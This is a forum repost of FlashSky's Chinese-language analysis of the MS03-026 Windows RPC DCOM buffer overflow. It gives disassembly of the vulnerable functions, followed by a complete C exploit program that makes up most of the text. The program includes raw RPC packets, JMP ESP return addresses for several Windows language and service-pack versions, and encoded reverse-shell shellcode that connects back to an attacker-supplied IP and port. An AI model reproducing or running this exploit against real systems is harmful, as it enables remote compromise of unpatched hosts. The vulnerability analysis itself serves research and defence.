论坛: 菜鸟乐园 标题: 好东西!!!lsdrpc溢出全分析(转自绿盟) 复制本贴地址    
作者: coyote [coyote]    论坛用户   登录
转摘请注明作者和安全焦点
作者:FLASHSKY
作者单位:启明星辰积极防御实验室
WWW SITE:WWW.VENUSTECH.COM.CN WWW.XFOCUS.NET,WWW.SHOPSKY.COM
邮件:flashsky@xfocus.org,fangxing@venustech.com.cn,webmaster@shopsky.com
感谢BENJURRY做测试,翻译和代码的通用化处理。
邮件:benjurry@xfocus.org

   LSD 的RPC溢出漏洞(MS03-26)其实包含了2个溢出漏洞,一个是本地的,一个是远程的。他们都是由一个通用接口导致的。
导致问题的调用如下:
   hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"C:\\1234561111111111111111111111111.doc",1,&qi);
   这个调用的文件名参数(第5个参数,会引起溢出),当这个文件名超长的时候,会导致客户端的本地溢出(在RPCSS中的GetPathForServer函数里只给了0X220堆栈的空间,但是是用lstrcpyw进行拷贝的),这个我们在这里就不深入研究了(不过这个API先会检查本地文件是否存在,在进行处理,因此由于建不了长文件,所以要利用这个溢出不能直接调用这个API,而是构造好包信息以后直接调用LPC的函数,有兴趣的可以自己去试。),我们来讲解一下远程的溢出。
      在客户端给服务器传递这个参数的时候,会自动转化成如下格式:L“\\servername\c$\1234561111111111111111111111111.doc"这样的形式传递给远程服务器,于是在远程服务器的处理中会先取出servername名,但是这里没做检查,给定了0X20(默认NETBIOS名)大小的空间,于是堆栈溢出产生了:
   问题代码如下:
GetPathForServer:
.text:761543DA                 push    ebp
.text:761543DB                 mov     ebp, esp
.text:761543DD                 sub     esp, 20h  <-----0x20空间
.text:761543E0                 mov     eax, [ebp+arg_4]
.text:761543E3                 push    ebx
.text:761543E4                 push    esi
.text:761543E5                 mov     esi, [ebp+hMem]
.text:761543E8                 push    edi
.text:761543E9                 push    5Ch
.text:761543EB                 pop     ebx
.text:761543EC                 mov     [eax], esi
.text:761543EE                 cmp     [esi], bx
.text:761543F1                 mov     edi, esi
.text:761543F3                 jnz     loc_761544BF
.text:761543F9                 cmp     [esi+2], bx
.text:761543FD                 jnz     loc_761544BF
.text:76154403                 lea     eax, [ebp+String1]《-----------写入的地址,只有0X20
.text:76154406                 push    0
.text:76154408                 push    eax
.text:76154409                 push    esi        〈----------------------我们传入的文件名参数
.text:7615440A                 call    GetMachineName
。。。。。。。。。。。。。。。。。。。。。。。。。。  此函数返回的时候,溢出点生效

GetMachineName:
.text:7614DB6F                 mov     eax, [ebp+arg_0]
.text:7614DB72                 mov     ecx, [ebp+arg_4]
.text:7614DB75                 lea     edx, [eax+4]
.text:7614DB78                 mov     ax, [eax+4]
.text:7614DB7C                 cmp     ax, 5Ch          〈-----------------只判断0X5C
.text:7614DB80                 jz      short loc_7614DB93
.text:7614DB82                 sub     edx, ecx
.text:7614DB84 
.text:7614DB84 loc_7614DB84:                           ; CODE XREF: sub_7614DA19+178j
.text:7614DB84                 mov     [ecx], ax      〈----------------写入上个只有0X20的空间,超过就溢出
.text:7614DB87                 inc     ecx
.text:7614DB88                 inc     ecx
.text:7614DB89                 mov     ax, [ecx+edx]
.text:7614DB8D                 cmp     ax, 5Ch
.text:7614DB91                 jnz     short loc_7614DB84
.text:7614DB93 

      OK,我们现在就需要想法来利用这个漏洞,由于\\SERVERNAME是由系统自动生成的,我们只能利用手工直接生成RPC的包来实现,另外SHELLCODE中不能包含0X5C,因为这样判断就是\\SERVERNAME结束了。
      下面就给出一个实现的代码,注意点如下:
       1.由于RPCRT4,RPCSS中没有JMP ESP的代码,这里使用了OLE32.DLL中的,但是这可能是会重定位的,大家测试的时候
需要再确定或自己找一个存在的JMP ESP的代脉,我的这是WIN2000+SP3上的地址且OLE32未重定位情况下的。
       2。这里使用了反向连接的SHELLCODE,需要先运行NC
       3。程序中的SC的整体长度必须满足sizeof(sz)%16=12的关系,因为不是整数的话,整个包的长度会有一些填充,那么
计算就不满足我这里给出的一个简单关系了,会导致RPC包的解析无效果。
       4。在溢出返回前,返回地址后面的2个参数还会使用,所以需要保证是个内存可写空间地址。
       5,这里是直接使用堆栈溢出返回的,其实大家也可以尝试一下覆盖SEH,这里就不再多讲了。
      
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
#pragma  comment(lib,"ws2_32")

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};




unsigned int jmpesp_nt_cn_sp5 = 0x77eedacf;    
unsigned int jmpesp_nt_cn_sp6 = 0x77f0eac3;    
unsigned int jmpesp_nt_cn_sp6a = 0x77f0eac3;    
    
unsigned int jmpesp_cn = 0x77e2e32a;
unsigned int jmpesp_cn_sp1 = 0x77e6898b;
unsigned int jmpesp_cn_sp2 = 0x77e0492b;
unsigned int jmpesp_cn_sp3 = 0x77e19296;
unsigned int jmpesp_cn_sp4 = 0x77df4c29;

unsigned int jmpesp_en = 0x77e33f4d;
unsigned int jmpesp_en_sp1 = 0x77e8898b;
unsigned int jmpesp_en_sp2 = 0x77e2492b;

unsigned int jmpesp_jp = 0x77f327e5;
unsigned int jmpesp_jp_sp1 = 0x77e5898b;
unsigned int jmpesp_jp_sp2 = 0x77df492b;

unsigned int jmpesp_kr = 0x77e1e32a;
unsigned int jmpesp_kr_sp1 = 0x77e5898b;
unsigned int jmpesp_kr_sp2 =  0x77df492b;

unsigned int jmpesp_mx = 0x77e1e32a;
unsigned int jmpesp_mx_sp1 = 0x77e8898b;


unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    
    "\x29\x4c\xdf\x77"
    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  //需要是可写的内存地址
        //下面是SHELLCODE,可以放自己的SHELLCODE,但必须保证sc的整体长度/16=12,不满足自己填充一些0X90吧
        //SHELLCODE不存在0X00,0X00与0X5C
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code 
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;
    
    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
    printf("Welcome to our English Site: http://www.xfocus.org\n");
    printf("Welcome to our Chinese Site: http://www.xfocus.net\n");


if(argc<4)
{
  printf("useage:%s targetip localIP LocalPort\n",argv[0]);
exit(1);
}


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    port1 = htons(atoi(argv[3]));  //反向连接的端口
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);//反向连接的IP    
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //计算文件名双字节长度
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    //计算各种结构的长度
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    len=recv(sock,buf1,1024,NULL);


补丁机理:
    补丁把远程和本地的溢出都补了,呵呵,这个这么有名的东西,我也懒得多说了。

补记:
    由于缺乏更多的技术细节,搞这个从上星期五到现在终于才搞定,惭愧,不过值得庆幸的是其间发现了RPC DCOM DOS的漏洞。先开始被本地溢出的迷惑了很久,怎么也无法远程进入这个函数,最后偶然的一次,让我错误的看花了眼,再远程调用的时候,以为GETSERVERPATH是存在本地溢出的GetPathForServer函数,,心中以为远程进入了GetPathForServer函数,仔细的跟踪,这才发现问题所在。感谢所有关心和指导我的同志们。 


地主 发表时间: 07/25 21:05

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号